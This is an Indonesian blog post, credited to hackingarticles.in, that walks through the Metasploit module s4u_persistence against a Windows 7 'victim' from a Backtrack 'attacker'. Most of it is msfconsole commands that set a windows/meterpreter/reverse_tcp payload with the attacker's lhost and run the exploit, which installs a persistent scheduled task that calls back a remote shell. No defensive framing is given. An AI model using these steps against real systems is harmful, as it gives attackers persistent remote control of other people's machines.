Windows Manage User Level Persistent Payload Installer

on Senin, 08 Juli 2013
Menciptakan tugas yang dijadwalkan yang akan berjalan menggunakan layanan untuk pengguna (S4U). Hal ini memungkinkan tugas dijadwalkan untuk berjalan bahkan sebagai user biasa yang tidak login ke perangkat. Hal ini akan menghasilkan dalam konteks keamanan yang lebih rendah, memungkinkan akses ke sumber daya lokal saja. Modul ini membutuhkan 'Logon sebagai pekerjaan batch' izin (SeBatchLogonRight).


Exploit Targets

Windows PC

Requirement

Attacker : Backtrack 5

Victim PC : Windows 7

Buka terminal di backtrack tipe : msfconsole




Sekarang tipe : use exploit/windows/local/s4u_persistence

msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (s4u_persistence)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (s4u_persistence)>set session 1 
msf exploit (s4u_persistence)>exploit
Semoga bermanfaat.
^_^
sumber : hackingarticles.in

0 komentar:

Posting Komentar

Terima kasih atas kunjungannya.
^_^

Pengunjung yang baik hati selalu meninggalkan komentarnya.